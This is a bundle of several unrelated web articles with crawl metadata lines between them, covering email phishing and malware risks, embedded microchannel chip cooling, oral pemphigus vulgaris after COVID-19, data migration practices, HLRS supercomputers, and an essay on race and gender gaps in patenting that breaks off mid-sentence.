s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00324.warc.gz
en
0.934792
415
2.703125
3
The average office worker receives over 120 emails per day. So much of our personal and professional communication these days is online, and you’ll want to make sure you’re safe while accessing your email account. Hackers have become increasingly savvy in recent years, and their attempts to access your information have become more sophisticated and covert. So can opening an email really get you hacked? Here’s what you need to know. Yes. There are some types of emails that can cause damage immediately upon opening, but if you know what to look for, you’ll usually be able to avoid them. This typically happens when an email allows scripting, which allows the hacker to insert a virus or malware directly into the email. The thing that puts you at the biggest risk of being hacked is opening an attachment in an email message. Hackers can hide viruses, ransomware, and other types of malware in these pieces of media. This malware can damage your systems and even compromise sensitive information like your passwords, bank account information, location, and more. Keep in mind that images are also attachments and can contain malware. Clicking a link in an email from a hacker can also have serious consequences. These links can take you to a website that results in an involuntary malware download or some other form of digital tracking. These links can also take you to a site that mimics a popular social media platform or financial app. These sites will often trick you into providing your username and password for these platforms, which they can use to steal your identity. You also put yourself at risk by replying to emails from people you don’t know or trust. Hackers have gotten incredibly creative with phishing scams in recent years, and it can sometimes be difficult to tell what is a scam and what is real. These hackers will often pose as a person or organization in need of support and manipulate you into providing their personal information. More sophisticated hackers will often pose as a website or app that the recipient already interacts with on a regular basis. They then mislead you so you will provide your password, phone number, or other personal information. And this is just the data on phishing attacks – 92 percent of all malware is delivered via email. Perpetrators have come up with a wide variety of strategies to gain access to online accounts. In fact, cybercrime went up significantly during the COVID-19 pandemic. With so many people working from home, email communication became even more important than it was previously. Many cybercriminals started sending out emails posing as the CDC or WHO with malicious attachments or links about current case numbers, vaccine information, and other information that would be relevant to the recipients. As email technology improves, hackers have learned to adapt quickly. It’s unlikely that email attacks will go away anytime soon, which means that we will need to be vigilant to protect your personal data. The consequences of an email attack can be very serious and aren’t something to be ignored. Email hacks can quickly get out of control if you don’t take action right away. The first thing that hackers will usually do is gain access to your email contacts. They will use this information to send scam emails to your contact list in an attempt to hack them as well. If you use the same passwords for your social media accounts as you do for your email, they may also gain access to these and start posting as you. Through a suspicious email, the hacker can put malware on your computer or mobile device. This malware can track you and gain access to even more of your personal information. In particular, the malware will look for access to your bank account and credit cards, which they can use for identity theft. When hacking corporate accounts, they will also look for access to secure business information, which they could then use as part of a ransomware attack. An attack on your work computer or phone isn’t just dangerous for you – it could also compromise the security of your entire company. There are many different types of email attacks to watch out for. As technology has changed and security software has gotten better, cybercriminals have developed new strategies and new types of attacks. Here are some of the most common types of email attacks to watch out for. Most people will receive phishing emails at some point, even if they aren’t successful. In a phishing email, the hacker will pretend to be a reputable organization or person. They will then use this unearned trust to manipulate the recipient into willingly sharing their personal information. When looking at a phishing email, there’s usually some sign that the sender isn’t who they claim to be – this could be an abnormal email address, uncharacteristic spelling mistakes, or links that seem out of place, for example. However, phishing attacks have become increasingly sophisticated in recent years as hackers have learned to better mimic reputable organizations and come up with new strategies. This is why it’s so important to err on the side of caution with questionable emails. There are some types of phishing attacks that you’re more likely to encounter at work. Spear phishing is a specific type of attack where the sender will pretend to be someone inside your organization and use personal details to gain your trust. If you are in a C-suite position, you may also experience whaling, in which the hacker specifically targets high-level individuals. A questionable email with attachments may contain spyware. Spyware is often hidden in attachments that contain legitimate software downloads, or in photo or video attachments that look harmless. Spyware puts trackers on your computer and sometimes in your web browser. These trackers monitor the websites you visit and the people you communicate with to find account passwords, credit card information, and more. Adware is a specific type of malware that places unwanted ads on your computer or mobile device. In addition to being very irritating, these ads can install spyware to track your online activity. Adware is usually placed in spam emails. While many spam emails are harmless, they are a perfect vehicle for attacks because they contain so many links and photos. Attachments in suspicious emails can also contain ransomware. Ransomware is a type of malware that will capture secure information from your computer and then demand money to give that information back. Cybercriminals often use ransomware to target organizations rather than individuals. This is because companies often have a large amount of secure customer information that is very valuable. The best way to avoid getting hacked via email is just to use common sense and be cautious before opening any new email. When you get an email, check to make sure it is from someone you know and trust before clicking any links or opening any attachments. Here are some other things you can do to avoid potentially dangerous emails. You won’t necessarily notice if your email has been hacked right away. Here are some signs to watch out for. In general, just opening an email isn’t going to get you hacked. However, clicking on links or attachments in an email can be very dangerous for you and your company. While exercising caution can help you avoid most email attacks, it’s also very important to make sure you’re using a reliable online security system to protect you even further.
<urn:uuid:39d25434-6132-45c6-a845-47ca2e6cfed5>
CC-MAIN-2024-38
https://parachute.cloud/can-opening-email-get-you-hacked/
2024-09-16T06:26:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00324.warc.gz
en
0.960721
1,498
2.984375
3
Researchers have developed a new type of cooling system for high-performance radars and supercomputers that circulates a liquid coolant directly into electronic chips through an intricate series of tiny microchannels. New advanced cooling technologies will be needed for high-performance electronics that contain three-dimensional stacks of processing chips instead of a single, flat-profile chip. Too much heat hinders the performance of electronic chips or damages the tiny circuitry, especially in small “hot spots.” “You can pack only so much computing power into a single chip, so stacking chips on top of each other is one way of increasing performance,” said Justin A. Weibel, a research associate professor in Purdue’s School of Mechanical Engineering, and co-investigator on the project. “This presents a cooling challenge because if you have layers of many chips, normally each one of these would have its own system attached on top of it to draw out heat. As soon as you have even two chips stacked on top of each other the bottom one has to operate with significantly less power because it can’t be cooled directly.” The solution is to create a cooling system that is embedded within the stack of chips. The work has been funded with a four-year grant issued in 2013 totaling around $2 million from the U.S. Defense Advanced Research Projects Agency (DARPA). New findings are detailed in a paper appearing on Oct. 12 in the International Journal of Heat and Mass Transfer. “I think for the first time we have shown a proof of concept for embedded cooling for Department of Defense and potential commercial applications,” Garimella said. “This transformative approach has great promise for use in radar electronics, as well as in high-performance supercomputers. In this paper, we have demonstrated the technology and the unprecedented performance it provides.” A fundamental requirement stipulated by DARPA is the ability to handle chips generating a kilowatt of heat per square centimeter, more than 10 times greater than in conventional high-performance computers. “This number of 1,000 watts per square centimeter is sort of a Holy Grail of microcooling, and we’ve demonstrated this capability in a functioning system with an electrically insulated liquid,” Garimella said. Much of the integration and testing of the system was performed by Purdue doctoral student Kevin Drummond. Key to fabrication of the devices used in the demonstration were teams led by co-investigators David Janes, a professor of electrical and computer engineering, and Dimitrios Peroulis, a professor of electrical and computer engineering and Deputy Director of the Birck Nanotechnology Center in Purdue’s Discovery Park. The team has presented preliminary findings in several conference papers during the course of the project. The researchers received a best paper award last year in the emerging technologies category at the IEEE-ITherm conference, and additional papers will be published, Garimella said. The system uses a commercial refrigerant called HFE-7100, a dielectric, or electrically insulating fluid, meaning it won’t cause short circuits in the electronics. As the fluid circulates over the heat source, it boils inside the microchannels. “Allowing the liquid to boil dramatically increases how much heat can be removed, compared to simply heating a liquid to below its boiling point,” he said. The team created an elaborate testing apparatus that simulates the heat generated by real devices. An array of heaters and temperature sensors allow the researchers to test the system under a range of conditions, including the effects of hot spots. The testing system was fabricated at the Birck Nanotechnology Center. The new approach improves efficiency by eliminating the need to attach cooling devices to chips. “Any time you are attaching heat sinks to the chip there are a lot of resistances and inefficiencies associated with that interface,” Garimella said. This interfacial, or “parasitic,” thermal resistance limits the performance of heat sinks. “We are going to a technology that eliminates those interfaces because the cooling is occurring inside the chips,” Weibel said. Using ultra-small channels allows for high performance. “It’s been known for a long time that the smaller the channel the higher the heat-transfer performance,” Drummond said. “We are going down to 15 or 10 microns in channel width, which is about 10 times smaller than what is typical for microchannel cooling technologies.” The new design solves one major obstacle to perfecting such systems: although using ultra-small channels increases the cooling performance, it is difficult to pump the required rates of liquid flow through the tiny microchannels. The Purdue team overcame this problem by designing a system of short, parallel channels instead of long channels stretching across the entire length of the chip. A special “hierarchical” manifold distributes the flow of coolant through these channels. “So, instead of a channel being 5,000 microns in length, we shorten it to 250 microns long,” Garimella said. “The total length of the channel is the same, but it is now fed in discrete segments, and this prevents major pressure drops. So this represents a different paradigm.” Peroulis and his students handled fabrication of the channels, a task made especially difficult by the need for “high aspect ratios,” meaning the microscopic grooves are far deeper than they are wide. The channels were etched in silicon with a width of about 15 microns but a depth of up to 300 microns. “So, they are about 20 times as deep as they are wide, which is a non-trivial challenge from a fabrication perspective, particularly for repeatable and low-cost manufacturing processes,” Peroulis said. Janes and his students designed and built the intricate heating and sensing portions of the testing apparatus. “It is a complex task to be able to simulate the generation of hotspots and different heating scenarios while simultaneously having an accurate measure of the temperatures” Janes said. Other members of the team focused on computational models to describe the physics of the cooling technology. The new journal paper was authored by Drummond; doctoral student Doosan Back; Michael D. Sinanis, a manufacturing engineer and process development manager; Janes; Peroulis; Weibel and Garimella. Although the team has recently completed the DARPA-funded project, the overall research is ongoing.
<urn:uuid:68da8158-3eae-4b80-986d-909df65292e4>
CC-MAIN-2024-38
https://debuglies.com/2017/10/24/researchers-have-developed-new-type-of-cooling-system-for-high-performance-radars-and-supercomputers/
2024-09-17T13:23:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00224.warc.gz
en
0.94766
1,381
3.546875
4
As of April 2023, the global impact of the coronavirus disease 2019 (COVID-19) pandemic is staggering, with over 676 million confirmed cases and a tragic toll of more than 6.8 million deaths reported worldwide. The pandemic has revealed varying degrees of case severity, influencing nearly every country in the world. This article delves into the intricate relationship between COVID-19 and autoimmune diseases, particularly Pemphigus Vulgaris (PV), shedding light on emerging cases and potential connections between the two. The COVID-19 Pandemic Landscape COVID-19, primarily transmitted through respiratory droplets and close contact, has exhibited fluctuating waves of infection rates, with spikes and subsequent drops over time. Factors such as population density, healthcare facilities provision, and public health measures have played crucial roles in determining the severity and impact of the pandemic.[2,3] Autoimmune Diseases and COVID-19 Emerging evidence suggests a potential influence of COVID-19 on the onset of autoimmune diseases, as highlighted by a systematic review linking COVID-19 to various autoimmune conditions.[4,5] Studies have indicated that the new onset of autoimmune diseases may occur post-COVID-19 diagnosis, with the severity of immune-related manifestations possibly correlating with the intensity of severe acute respiratory syndrome coronavirus 2 (SARS-CoV-2) infection. Autoantibodies found in COVID-19 patients further support the association between the infection and autoimmune diseases, indicating shared clinical manifestations, immune responses, and pathogenic mechanisms.[7,8] Understanding Pemphigus Vulgaris Pemphigus Vulgaris (PV) is a mucocutaneous autoimmune disease characterized by widespread bullae and ulceration on the skin and mucosa. The disease results from the production of autoantibodies against desmoglein-1 and desmoglein-3, leading to intraepithelial acantholysis and damage to the keratinocyte layer of the epithelium. Several risk factors, including genetics, drugs, viral infections, allergens, and psychological stress, have been identified as potential triggers for PV.[9,10] Emerging Cases of Oral PV Post-COVID-19 This manuscript focuses on the emerging cases of oral PV following COVID-19 infection, highlighting the critical need to identify this life-threatening condition early in post-COVID-19 patients. Individuals with oral PV may experience impaired physiological function due to extensive ulceration and prolonged pain. The link between COVID-19 and oral PV serves as a crucial area of exploration for healthcare professionals and researchers. The emergence of oral pemphigus vulgaris (PV) in the aftermath of COVID-19 infection raises intriguing questions about the potential links between viral infections and the onset of autoimmune diseases. The presented case series, encompassing four individuals diagnosed with PV approximately one to five months following COVID-19 infection, underscores the need for a comprehensive understanding of the consequences of SARS-CoV-2 infection on the immune system and the subsequent development of autoimmune conditions. COVID-19 and Oral Ulceration The association between oral ulceration and COVID-19 infection remains a complex and relatively uncharted territory.[12–14] The clinical manifestations of COVID-19, particularly in the oral cavity, can mimic those of various oral diseases, including autoimmune conditions. Individuals with a history of autoimmune diseases, such as PV and oral lichen planus, may experience recurrent episodes and heightened severity of illness, as observed in the presented cases. The Case Series The presented case series, authored by Gunardi et al. and published in the Journal of Oral and Maxillofacial Pathology in July-September 2023, details the experiences of four patients who developed oral and skin lesions diagnosed as PV following a recent history of COVID-19 infection. The patients, aged between 33 and 57, demonstrated diverse clinical presentations and treatment responses. Autoimmune Diseases and COVID-19 Autoimmune diseases involve abnormal immune responses directed against self-antigens. More than 80 categories of autoimmune disorders exist, and while their etiologies are not fully understood, factors such as genetics, age, environment, and viral infections have been implicated. Notably, prior studies have associated herpesviruses, cytomegalovirus, and varicella zoster with PV.[16,17] The study by Gunardi et al. contributes to this body of knowledge, suggesting a potential link between SARS-CoV-2 infection and the development of PV.[18–21] Mechanisms of Autoimmunity Triggered by Viruses The proposed mechanisms of autoimmunity triggered by viruses, including SARS-CoV-2, involve molecular mimicry, bystander activation, and epitope spreading. The high expression of angiotensin-converting enzyme 2 (ACE2) receptors, identified as the key functional receptor for SARS-CoV-2, in skin keratinocytes and oral mucosa is noteworthy.[22–25] The cases presented by Gunardi et al. indicate a consistent pattern of initial oral lesions followed by skin involvement, aligning with the distribution of ACE2 receptors. Limitations and Future Directions While the case series provides valuable insights, limitations exist, primarily stemming from the reliance on medical records for COVID-19 data. The lack of specific information regarding the SARS-CoV-2 virus type and the medications administered during COVID-19 treatment poses challenges in pinpointing potential factors contributing to PV development. In conclusion, the discussion surrounding the emergence of oral PV post-COVID-19 infection offers a nuanced exploration of potential connections between viral infections and autoimmune diseases. The presented cases emphasize the importance of heightened vigilance among clinicians regarding the possibility of autoimmune reactions following the COVID-19 pandemic. As researchers continue to unravel the mechanisms underlying PV induced by SARS-CoV-2, further investigations are warranted to elucidate the intricate interplay between viral infections, genetic predispositions, and the onset of autoimmune diseases. The study by Gunardi et al. contributes to the growing body of literature in this field, prompting a call for ongoing research and a deeper understanding of the complex relationships between viral infections and autoimmune pathologies. reference link : https://journals.lww.com/jpat/fulltext/2023/27030/the_emerging_concern_of_oral_pemphigus_vulgaris.26.aspx
<urn:uuid:757a5d53-e26f-4bb8-a561-d6ef428f6763>
CC-MAIN-2024-38
https://debuglies.com/2023/12/04/emerging-cases-of-pemphigus-vulgaris-following-covid-19-infection/
2024-09-17T12:17:27Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00224.warc.gz
en
0.900262
1,360
2.734375
3
Data migration is the shifting of data from one device to another. Businesses need to keep their data secure and available all through transitions. In this blog, we’ll write down the steps involved in the data migration process and offer suggestions for a smooth procedure. When upgrading systems or switching platforms, migration guarantees that important data aren’t misplaced. Businesses can limit disruptions and hold productivity by knowing the fundamentals of data migration. Let’s get started. What is data migration and why does it matter? Data migration is the most common way of moving data, starting with one framework and moving on to the next. It includes moving data while at the same time making sure of their integrity and accessibility in the new surroundings. This is critical for system upgrades, platform migrations, or organizational adjustments. Why does data migration matter? Data migration matters for many reasons: - Preservation of Data – It ensures that valuable data are preserved and available after transitioning to a new system. - Business Continuity – Data migration permits uninterrupted operations. By ensuring that crucial data is available when needed. - Compliance Requirements – Many industries have strict regulations about data storage and control. Data migration allows businesses to observe these requirements. - Facilitates Growth – Organizations will want to undertake new technology or systems as they expand and evolve. Data migration helps this by allowing seamless transitions. Data migration is not just about shifting documents but is about safeguarding the lifeblood of organizations—data. Now, let’s proceed to the types of data migration. Types of data migration Data migration can take a diverse form, relying on a business’s precise needs and targets. Here is a portion of the standard kinds: - Storage Migration – Storage migration is transferring data between unique storage systems. It upgrades hardware or shifts statistics to cloud storage. It helps consolidate storage infrastructure, ensuring data accessibility and scalability and minimizing storage prices. - Database Migration – Database migration moves data from one platform to another and upgrades database software or versions. It consolidates databases for progressed efficiency, ensuring data integrity and compatibility. Additionally, it optimizes database performance. - Application Migration – Application migration is transitioning data among specific software programs. It upgrades software versions or migrates to new structures and ensures seamless integration with current systems. Additionally, it minimizes disruptions to business operations. - Cloud Migration – Cloud migration moves data and applications to cloud-based platforms and leverages cloud infrastructure for scalability and flexibility. Additionally, it ensures data protection and compliance with regulations. It optimizes cloud assets’ cost efficiency and implements backup and disaster recovery measures. - Platform Migration – Platform migration is transitioning data from one computing platform to another. It enables migration from on-premise to cloud-based systems, ensuring compatibility and interoperability between structures. This migration tests and validates platform functionality publish-migration. It trains its customers on the brand-new platform to help adoption. Data migration encompasses various types, every with its specific challenges and concerns. Now, let’s see the various steps of the data migration process. What are the various steps of the data migration process? The data migration approach is a multi-step process and calls for cautious planning and execution to ensure fulfillment. Here are the key steps to worry about: - Assessment and Planning – Start by identifying data sources and destinations. Assess information quality and integrity and define migration goals and objectives. Next, you can develop a migration strategy and timeline, divide assets, and assign duties accordingly. - Data Profiling and Cleansing – Profile information to apprehend its shape and layout and get rid of duplicates and inconsistencies. Standardize data formats and conventions and confirm data accuracy and completeness, ensuring compliance with regulations. - Testing and Validation – Conduct test migrations to confirm the technique. Compare migrated information with supply data for accuracy. Next, test integration with current structures and verify data integrity and consistency. This will enable you to address any issues or gaps identified during check-out. - Execution and Migration – Execute the migration in line with the defined plan. Check migration development and performance and ensure data is transferred securely and effectively. Install rollback approaches in case of screw-ups and communicate updates to stakeholders. - Post-Migration Activities – Verify record completeness and accuracy post-migration and conduct User acceptance testing (UAT) to confirm functionality. Address any publish-migration bugs or issues while educating and supporting users on brand-new devices. The data migration process is complex but crucial for organizations. Now let’s focus on the list of five tools that assist in data migration. 5 best tools that assist in data migration Here is a list of five database migration tools that help in development: - AWS Database Migration Service (DMS) – AWS offers a managed provider for migrating databases to the AWS cloud. It supports homogeneous and heterogeneous migrations, provides minimal downtime throughout migrations, and offers complete data replication and high availability. AWS is compatible with database engines like MySQL, Oracle, SQL Server, etc. - Microsoft Data Migration Assistant (DMA) – DMA assists in migrating on-premises databases to Microsoft Azure. It provides assessment reports for compatibility issues and performance upgrades and supports schema and data migration for SQL Server, MySQL, and Oracle. Moreover, it offers compatibility tests for Azure SQL Database and SQL Server on Azure VMs. DMA helps in upgrading older variations of SQL Server to the modern version. - Informatica PowerCenter – A comprehensive data integration platform for organizations’ data migration, Informatica Powecenter supports batch and real-time information migration. It offers data profiling, cleansing, and transformation abilities. Additionally, it enables integration with various data resources and objectives. It provides scalability, reliability, and performance optimization functions. - Talend Data Integration – A unified platform for data integration and migration obligations, Talend data integration supports batch, real-time, and massive data integration. It offers a graphical interface for designing and executing migration workflows. It provides connectors for various databases, cloud structures, and programs. Talend enables code generation and deployment for data migration responsibilities. - Carbonite Migrate – Carbonite migration facilitates seamless migrations to cloud, digital, and bodily environments. It offers automatic discovery and evaluation of migration requirements and supports close to zero downtime migrations. It provides real-time tracking and reporting of migration progress. Carbonite ensures record integrity and security throughout the migration method. These tools provide various functions and skills to streamline data migration. It guarantees effective results for organizations, everything being equal. Now, let’s look at the challenges of performing data migration. Is performing data migration challenging? Performing data migration can certainly be difficult because of different factors. Here are six reasons why: - The complexity of Data Structures – Different data assets may additionally have complicated structures. Mapping data fields as they should be may be difficult. Transformation rules may vary among structures; thus, ensuring data integrity and consistency is important while dealing with unstructured or semi-dependent information, which provides complexity. - Volume and Variety of Data – Large volumes of data need efficient migration techniques. Handling many data types and codecs poses challenges. Therefore, ensuring information security and compliance is vital while dealing with legacy structures and previous technologies complicates the procedure. Managing statistics dependencies and relationships calls for cautious planning. - Downtime and Disruptions – Minimizing downtime during migration is tough; ensuring enterprise continuity while migrating vital data is essential. Balancing the need for migration velocity with factual accuracy is hard. Addressing surprising issues or failures can disrupt operations while coordinating with stakeholders and customers, which adds complexity to the procedure. - Resource Allocation and Skill Requirements – Adequate sources and expertise are crucial for successful migration. Finding skilled experts who revel in data migration can take time and effort. Training personnel on new technologies and tools is critical. However, this can often pose a challenge, as it takes delicate resource management to balance ongoing training and daily operations successfully. - Regulatory and Compliance Considerations – Compliance with regulatory standards provides complexity to data migration. Ensuring data privacy and protection for the duration of migration is critical. Adhering to industry standards and best practices requires cautious planning, documenting migration procedures, and maintaining audit trails, which are essential for compliance. Without proper knowledge or careful implementation, an organization can face legal troubles. Performing data migration is a complex task that calls for careful planning, execution, and management. By understanding the challenges, agencies can better prepare and mitigate risks to ensure a migration. Now, let’s proceed to the approach to perform data migration well. What should be the approach to perform data migration well? To carry out data migration techniques, it’s essential to undertake a scientific approach. Here’s what can be done: Assessment and Planning - Assess data sources, locations, and requirements. - Define migration desires, objectives, and achievement criteria. - Develop an in-depth migration plan with timelines and milestones, divide sources, and assign duties to groups of contributors. Data Profiling and Cleansing - Profile data to understand its characteristics and cleanse data by casting off duplicates, inconsistencies, and errors. - Standardize data codecs, conventions, and naming conventions. - Confirm data accuracy, completeness, and integrity. Data Mapping and Transformation - Map data fields and attributes among supply and goal systems. - Define transformation policies, common sense, and mappings. - Convert data formats, values, and devices and thoroughly test information mapping and transformation approaches. Testing and Validation - Look at migration processes and compare migrated data with supply information for accuracy and completeness. - Perform integration testing with current structures and packages. Verify data integrity, consistency, and reliability. Execution and Migration - Execute the migration in a manner consistent with the defined plan and agenda. - Check migration progress, performance, and useful resource usage. Address any issues, mistakes, or screw-ups promptly. Install rollback tactics if important to mitigate dangers. The data migration process is crucial for businesses navigating technological improvements. Organizations can mitigate risks by following a scientific approach and leveraging the proper tools and strategies to ensure an easy transition to new structures and systems. With careful planning, execution, and submit-migration sports, organizations can harness their data’s entire capability, preserving productivity and minimizing disruptions.
<urn:uuid:130424f9-b07a-4a88-b16f-b2b48be9c7e2>
CC-MAIN-2024-38
https://www.kovair.com/blog/the-comprehensive-guide-to-data-migration-processes/
2024-09-07T20:44:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00224.warc.gz
en
0.895082
2,156
2.6875
3
In the first stage, a transitional supercomputer, called Hunter, will begin operation in 2025. This will be followed in 2027 with the installation of Herder, an exascale system that will provide a significant expansion of Germany’s high-performance computing (HPC) capabilities. Hunter and Herder will offer researchers world-class infrastructure for simulation, artificial intelligence (AI), and high-performance data analytics (HPDA) to power cutting-edge academic and industrial research in computational engineering and the applied sciences. The total combined cost for Hunter and Herder is €115 million. Funding will be provided through the Gauss Centre for Supercomputing (GCS), the alliance of Germany’s three national supercomputing centers. Half of this funding will be provided by the German Federal Ministry of Education and Research (BMBF), and the second half by the State of Baden-Württemberg’s Ministry of Science, Research, and Arts. Hunter to Herder: a Two-Step Climb to Exascale Hunter will replace HLRS’s current flagship supercomputer, Hawk. It is conceived as a stepping stone to enable HLRS’s user community to transition to the massively parallel, GPU-accelerated structure of Herder. Hunter will be based on the HPE Cray EX4000 supercomputer, which is designed to deliver exascale performance to support large-scale workloads across modeling, simulation, AI, and HPDA. Each of the 136 HPE Cray EX4000 nodes will be equipped with four HPE Slingshot high-performance interconnects. Hunter will also leverage the next generation of Cray ClusterStor, a storage system purpose-engineered to meet the demanding input/output requirements of supercomputers, and the HPE Cray Programming Environment, which offers programmers a comprehensive set of tools for developing, porting, debugging, and tuning applications. Hunter will raise HLRS’s peak performance to 39 petaFLOPS (39*1015 floating point operations per second), an increase from the 26 petaFLOPS possible with its current supercomputer, Hawk. More importantly, it will transition away from Hawk’s emphasis on CPU processors to make greater use of more energy-efficient GPUs. Hunter will be based on the AMD Instinct MI300A accelerated processing unit (APU), which combines CPU and GPU processors and high-bandwidth memory into a single package. By reducing the physical distance between different types of processors and creating unified memory, the APU enables fast data transfer speeds, impressive HPC performance, easy programmability and great energy efficiency. This will slash the energy required to operate Hunter in comparison to Hawk by approximately 80% at peak performance. Herder will be designed as an exascale system capable of speeds on the order of one quintillion (1018) FLOPS, a major leap in power that will open exciting new opportunities for key applications run at HLRS. The final configuration, based on accelerator chips, will be determined by the end of 2025. The combination of CPUs and accelerators in Hunter and Herder will require that current users of HLRS’s supercomputer adapt existing code to run efficiently. For this reason, HPE will collaborate with HLRS to support its user community in adapting software to harness the full performance of the new systems. Supporting Scientific Excellence in Stuttgart, Germany, and Beyond HLRS’s leap to exascale is part of the Gauss Centre for Supercomputing’s national strategy for the continuing development of the three GCS centers: The upcoming JUPITER supercomputer at the Jülich Supercomputing Centre will be designed for maximum performance and will be the first exascale system in Europe in 2025, while the Leibniz Supercomputing Centre is planning a system for widescale usage in 2026. The focus of HLRS’s Hunter and Herder supercomputers will be on computational engineering and industrial applications. Together, these systems will be designed to ensure that GCS provides optimized resources of the highest performance class for the entire spectrum of cutting-edge computational research in Germany. For researchers in Stuttgart, Hunter and Herder will open many new opportunities for research across a wide range of applications in engineering and the applied sciences. For example, they will enable the design of more fuel-efficient vehicles, more productive wind turbines, and new materials for electronics and other applications. New AI capabilities will open new opportunities for manufacturing and offer innovative approaches for making large-scale simulations faster and more energy efficient. The systems will also support research to address global challenges like climate change, and could offer data analytics resources that help public administration to prepare for and manage crisis situations. In addition, Hunter and Herder will be state-of-the-art computing resources for Baden-Württemberg’s high-tech engineering community, including the small and medium-sized enterprises that form the backbone of the regional economy. Petra Olschowski, Baden-Württemberg’s minister of Science, Research, and Arts said: “High-performance computing means rapid development. As the peak performance of supercomputers grows, they are as crucial for cutting-edge science as for innovative products and processes in key industrial sectors. Baden-Württemberg is both a European leader and internationally competitive in the fields of supercomputing and artificial intelligence. As part of the University of Stuttgart, HLRS thus has a key role to play — it is not just the impressive performance of the supercomputer but also the methodological knowledge that the center has assembled that helps our cutting-edge computational research to achieve breathtaking results, for example in climate protection or for more environmentally sustainable mobility.“ “Increasingly it’s not just faster hardware but optimal usage of the system that is the greatest performance factor in simulation and artificial intelligence,” said Dr. Bastian Koller, general manager of HLRS. “We are particularly excited that we have found a globally leading partner for these topics in Hewlett Packard Enterprise, who together with AMD will open up new horizons of performance for our clients.”
<urn:uuid:e6af19f2-0403-463a-aa0d-483364a971ed>
CC-MAIN-2024-38
https://www.hpcwire.com/off-the-wire/hlrs-set-to-introduce-supercomputer-hunter-followed-by-exascale-powerhouse-herder-in-stuttgart/
2024-09-12T14:57:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00724.warc.gz
en
0.906955
1,293
2.640625
3
National myths about inventorship normalize entrenched discrimination in STEM fields. When President Barack Obama signed the America Invents Act in 2011, he was surrounded by a group of people of diverse ages, genders and races. The speech he delivered about the legislation, which changed the technical requirements for filing a patent, highlighted this diversity by emphasizing that today anyone can become an inventor in the United States. Despite Obama’s optimism about women and people of color inventing and patenting the nation’s new and innovative technologies, both groups still lag considerably behind their white male counterparts in being recognized as inventors and owning patents, in the U.S. and globally. Women and people of color possess the same intellectual capacities as their white male counterparts. Yet empirical studies consistently show that patent law overwhelmingly rewards white men for their labor and skill. This is in part because women and people of color join science, technology, engineering and math (STEM) fields in much lower numbers than white men. In 2017, women made up over half of the workforce, but held only 29% of STEM jobs. But even women and people of color who go into STEM fields invent and patent far less often than their white male counterparts. The question is why. As a researcher who studies race, rhetoric and intellectual property law, I can say that the U.S.‘s race and gender invention and patent gap results partly from a failure of imagination. The stories that people tell about invention in the U.S. continue to focus on white men – the Benjamin Franklins, Thomas Edisons and Elon Musks – without affording women and people of color the same larger-than-life status. National myths about inventorship and political barriers to patenting set up women and people of color for failure by normalizing entrenched discrimination even when they join STEM fields. The Stories We Tell about Inventors Critical race theorists show how legal terms and everyday narratives can look as if they create a level playing field while allowing implicit bias to thrive. In my new book, “The Color of Creatorship,” I look at how intellectual property law has evolved racially over 200 years. Black and brown people are no longer legally prohibited from owning patents and copyrights, as they were in the 1700s and 1800s. However, seemingly colorblind patent and copyright laws continue to practically favor white male inventors and creators by using legal definitions and tests that protect inventions and creations that tend to match Western conceptions and expectations of, for instance, expertise and creativity. From the now cliché “think outside the box” to Apple’s slogan “think different,” innovation, a central component of invention, is associated with breaking limits. Yet Americans have largely failed to change the ways that they think and talk about invention itself. Even Obama’s speech about the America Invents Act begins by explaining how Thomas Jefferson epitomized the nation’s mythic spirit of invention and innovation. Yet Jefferson held the racist view that Black people lacked the capacity to be truly imaginative creators, let alone citizens of the nation. Breaking limits, it turns out, is most often a privilege afforded to white people. The current historical moment, in which facts are negotiable, white nationalism is on the rise and the nation is weathering a pandemic, is an important time to redefine American mythologies of invention. Celebrating the inventive capacity of women and people of color matters. Recognizing their innovative genius, in films like “Hidden Figures,” helps transform what had been marginalized stories into narratives that are central to history. Obama’s reference to Jefferson reinforced powerful, limiting conventional wisdom about invention and innovation. Popular cultural narratives frequently invoke the contributions of white men while erasing those of women and people of color. For example, the History Channel’s The Men Who Built America focuses on the inventions and innovations of Cornelius Vanderbilt, John D. Rockefeller, Andrew Carnegie and Henry Ford, business titans who achieved tremendous success via dubious ethics. The show’s use of the Great Man theory of inventorship and entrepreneurship leaves out the many women and people of color, including Thomas Jennings, Elijah McCoy, Miriam E. Benjamin and Sarah E. Goode who, as legal scholar Shontavia Johnson shows, not only invented and patented during the same period but, as legal scholar Kara Swanson shows, used their work to lobby for suffrage rights for women and people of color. Attacking Asian Innovation America’s white-male-centered imaginings of inventorship and patenting extend beyond the nation’s borders, in xenophobic pronouncements frequently directed at Asian nations. Apple co-founder Steve Wozniak recently proclaimed: “Success in India is based on studying, having a job … where’s the creativity?” Similarly, President Trump claimed to be “protecting the innovations, creations, and inventions that power our country” from Chinese graduate students, who are part of a racial group that has long boosted America’s economy, fueled global innovation and offered pandemic assistance. Refusal to recognize diversity in inventorship is a bipartisan affair. Then-presidential candidate and current President-elect Joseph Biden made a shocking assertion about innovation in China: “I challenge you, name me one innovative project, one innovative change, one innovative product that has come out of China.” Inventing New Ways to Talk about Invention Racist, sexist and xenophobic inventorship and patenting norms are not immutable facts. They are practices built on exclusionary stories and feelings, transformed into familiar myths, including that of the American dream. These exclusionary stories frequently function as dog whistles that have long been used to fuel white anxieties about people of color and men’s anxieties about women. They make it difficult for women and people of color to prove they have the expertise needed to invent and patent. However, as films like “Hidden Figures” emphatically show, it’s possible to tell inclusionary stories. I argue that telling them is an ethical act because it ensures that society recognizes the genius of people of all identities – race, gender, nationality, religion, ability, age – in contributing to invention and innovation, current and historical. Rhetoricians frequently proclaim that “words mean things.” This is certainly true when imagining who has the capacity to perform certain tasks, such as inventing and patenting. At a moment in which the U.S. faces threats to democracy, environment and economy, it is more important than ever to invent new ways of talking about invention. People of all identities deserve the opportunities to create and own their innovative solutions for solving the world’s most pressing problems. More importantly, they deserve to be treated as 